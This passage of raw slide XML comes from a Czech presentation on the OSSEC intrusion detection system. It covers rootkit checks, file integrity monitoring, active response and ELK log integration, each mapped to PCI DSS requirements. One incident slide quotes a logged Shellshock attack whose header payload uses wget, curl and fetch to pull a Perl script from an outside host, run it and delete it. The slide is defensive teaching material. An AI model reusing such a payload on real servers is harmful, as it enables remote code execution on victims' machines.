              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>sledování </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>bezpečnostní politiky. Jedná se o proces ověření, že všechny systémy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>jsou v </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>souladu se souborem předdefinovaných pravidel okolních </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>nastavení. Tento soubor je schválený pro využití </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>aplikací.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>Existuje několik požadavků PCI DSS, aby ověřila, že systémy jsou správně </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>nastavené.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> Příkladem by mohl </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>být tento požadavek PCIDSS:</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" dirty="0" smtClean="0"/>
              <a:t>PCIDSS - 2.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" dirty="0"/>
              <a:t>Vyvinout konfigurační standardy pro všechny systémové komponenty. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" dirty="0" smtClean="0"/>
              <a:t>Ujistit se, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" dirty="0"/>
              <a:t>že tyto standardy řeší všechny známé bezpečnostní chyby a jsou v souladu s normami </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>systémU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8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Rootcheck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0" err="1"/>
              <a:t>Rootkits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0" err="1"/>
              <a:t>detection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47274"/>
            <a:ext cx="10363826" cy="394392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Rootcheck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t> - K </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>dispozici jsou následující </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>volby:</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>rootkit_files</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>: Obsahuje unixové aplikační úrovni podpisy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>rootkit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rootkit_trojans</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>: Obsahuje trojské podpisy Unix založené na aplikační úrovni.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>check_files</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>: Povolení nebo zakázání kontroly </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>rootkit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>. Výchozí ano.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>check_trojans</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>: Povolení nebo zakázání kontroly Trojana. Výchozí ano.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>check_dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>: Kontrola podezřelých souborů v / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> souborový systém. Výchozí ano.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>check_sys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Scan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> celý systém pro detekci anomálií. Výchozí ano.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>check_pids</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>: Kontrola procesů. Výchozí ano.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>check_ports</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>: Zkontrolujte všechny porty. Výchozí ano.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>check_if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>: Kontrola rozhraní. Výchozí ano.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0" err="1"/>
              <a:t>Rootcheck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>integruje splnění </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>PCI DSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>požadavku 11.4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>související s průniky, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>trojskými koňmi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>malware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> obecně:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" dirty="0" smtClean="0"/>
              <a:t>PCIDSS- 11.4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" dirty="0"/>
              <a:t>Využití detekce narušení a / nebo technik prevence proti narušení pro detekci a / nebo prevenci vniknutí do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" dirty="0" smtClean="0"/>
              <a:t>sítě…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9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File</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> Integrity </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>Monitoring - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>syscheck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Monitoring integrity souborů (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0" err="1"/>
              <a:t>SysCheck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1700" dirty="0"/>
              <a:t>se provádí porovnáním </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1700" dirty="0" smtClean="0"/>
              <a:t>kryptografického kontrolního součtu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1700" dirty="0"/>
              <a:t>dobře známým souborem proti </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1700" dirty="0" smtClean="0"/>
              <a:t>kontrolnímu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1700" dirty="0"/>
              <a:t>souboru poté, co byl změněn. OSSEC Agent kontroluje systém při zadaném intervalu, a odešle kontrolní součty sledovaných souborů a klíčů registru (pro systémy Windows) na server OSSEC. Server ukládá kontrolní součty a hledá </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1700" dirty="0" smtClean="0"/>
              <a:t>modifikaci </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1700" dirty="0"/>
              <a:t>porovnáním nově </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1700" dirty="0" smtClean="0"/>
              <a:t>přijatých </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1700" dirty="0"/>
              <a:t>kontrolních součtů proti historické </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1700" dirty="0" smtClean="0"/>
              <a:t>hodnotě </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1700" dirty="0"/>
              <a:t>kontrolních součtů tohoto souboru nebo registru </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1700" dirty="0" smtClean="0"/>
              <a:t>klíče.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1700" dirty="0"/>
              <a:t> Výstraha se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1700" dirty="0" smtClean="0"/>
              <a:t>pak odešle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1700" dirty="0"/>
              <a:t>, pokud se něco změní.</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" sz="1900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0" smtClean="0"/>
              <a:t>SYSCHECK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t> je použit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>ke splnění PCI DSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>požadavku 11.5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" dirty="0" smtClean="0"/>
              <a:t>PCIDSS - 11.5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" dirty="0"/>
              <a:t>Zavedení mechanismu změna detekce (například nástroje pro sledování integrity souborů) upozorňuje personál na neoprávněné </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" dirty="0" smtClean="0"/>
              <a:t>změny </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" dirty="0"/>
              <a:t>(včetně změn, dodatků a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" dirty="0" smtClean="0"/>
              <a:t>detekce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" dirty="0"/>
              <a:t>) kritických systémových souborů, konfiguračních </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" dirty="0" smtClean="0"/>
              <a:t>souborů…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aktivní </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0" smtClean="0"/>
              <a:t>odezva</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="cs-CZ" b="1" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0" smtClean="0"/>
              <a:t>ACTIVE RESPONSE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Ačkoliv </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>aktivní odezva</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>není </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>výslovně popsána v PCI DSS, je důležité </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>ji zmínit. automatizovaná kontrola </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>na porušení bezpečnosti a hrozby, je mocný nástroj, který snižuje riziko. </a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>Aktivní </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>odezva umožňuje </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>skriptované</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> akce, které mají být provedeny </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>kdykoliv. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>Ovládána Nápravná </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>opatření </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>jsou pak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>Block</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>/ drop, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>traffic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>shaping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> nebo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>zablokování, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>uzamčení účtu, atd.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17748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ELK</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>elasticsearch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>logstash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>kibana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Ossec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t> integrace s ELK - Můžeme udělat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>forenzní a historickou analýzu záznamů a ukládat data po dobu několika let, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>na spolehlivé </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>škálovatelné platformě.</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>PCIDSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>požadavky mohou být splněny kombinací OSSEC + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>ELK:</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" dirty="0" smtClean="0"/>
              <a:t>PCIDSS - 10.5 Zabezpečit auditní záznamy tak aby nemohly být změněny.</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" dirty="0" smtClean="0"/>
              <a:t>PCIDSS - 10.6.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" dirty="0"/>
              <a:t>Zkontrolujte následující </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" dirty="0" smtClean="0"/>
              <a:t>body alespoň </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" dirty="0"/>
              <a:t>jednou denně: </a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" dirty="0" smtClean="0"/>
              <a:t>všech </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" dirty="0"/>
              <a:t>bezpečnostních </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" dirty="0" smtClean="0"/>
              <a:t>událostí, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" dirty="0" smtClean="0"/>
              <a:t>Záznamy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" dirty="0"/>
              <a:t>všech kritických systémových komponent, atd.</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" dirty="0" smtClean="0"/>
              <a:t>PCIDSS - 10.7 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" dirty="0"/>
              <a:t>Zachovat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" dirty="0" smtClean="0"/>
              <a:t>historii auditních záznamů </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" dirty="0"/>
              <a:t>po dobu nejméně jednoho roku, s minimem tří </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" dirty="0" smtClean="0"/>
              <a:t>měsíců, které jsou k </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" dirty="0"/>
              <a:t>dispozici pro </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" dirty="0" smtClean="0"/>
              <a:t>online analýzu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6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Ossec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t> integrace </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>openscap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>, ELK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03" y="2366963"/>
            <a:ext cx="7879593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91810"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>Datové toky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636"/>
            <a:ext cx="12192000" cy="54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01</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>Zjištění problému </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>Shellshock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>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Stroj01</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>193.xx.xx.xx </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>- - [12/Nov/2016:20:10:33 +0100] "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0"/>
              <a:t>GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0" err="1"/>
              <a:t>cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0"/>
              <a:t>-bin/test-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0" err="1"/>
              <a:t>cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0"/>
              <a:t> HTTP/1.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0"/>
              <a:t>404</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> 11 "-" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" u="sng" dirty="0"/>
              <a:t>"() { :;}; /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" u="sng" dirty="0" err="1"/>
              <a:t>bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" u="sng" dirty="0"/>
              <a:t> -c \x22wget -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" u="sng" dirty="0" err="1"/>
              <a:t>qO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" u="sng" dirty="0"/>
              <a:t> - http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>195.xx.xx.xx:8081</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" u="sng" dirty="0"/>
              <a:t>/.mail | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" u="sng" dirty="0" err="1"/>
              <a:t>perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" u="sng" dirty="0"/>
              <a:t> ; cd /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" u="sng" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" u="sng" dirty="0"/>
              <a:t> ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" u="sng" dirty="0" err="1"/>
              <a:t>curl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" u="sng" dirty="0"/>
              <a:t> -O http://195.3.144.77:8081/.mail ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" u="sng" dirty="0" err="1"/>
              <a:t>fetch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" u="sng" dirty="0"/>
              <a:t> http://195.3.144.77:8081/.mail ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" u="sng" dirty="0" err="1"/>
              <a:t>perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" u="sng" dirty="0"/>
              <a:t> .mail ;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" u="sng" dirty="0" err="1"/>
              <a:t>rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" u="sng" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" u="sng" dirty="0" err="1"/>
              <a:t>rf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" i="1" u="sng" dirty="0"/>
              <a:t> .mail* \x22</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>" "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0" smtClean="0"/>
              <a:t>208.109.249.220</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>„</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>GEOIP 208.109.249.220 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> USA, Arizona, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Scottsdale</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>, GoDaddy.com (ISP)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Je to ISP provider.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7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02</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1" smtClean="0"/>
              <a:t>Attempt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t> to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forbidden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r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directory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STROJ02</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[Sat Nov 12 18:55:20 2016] [error] [client 93.189.26.18] client denied by server configuration: /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
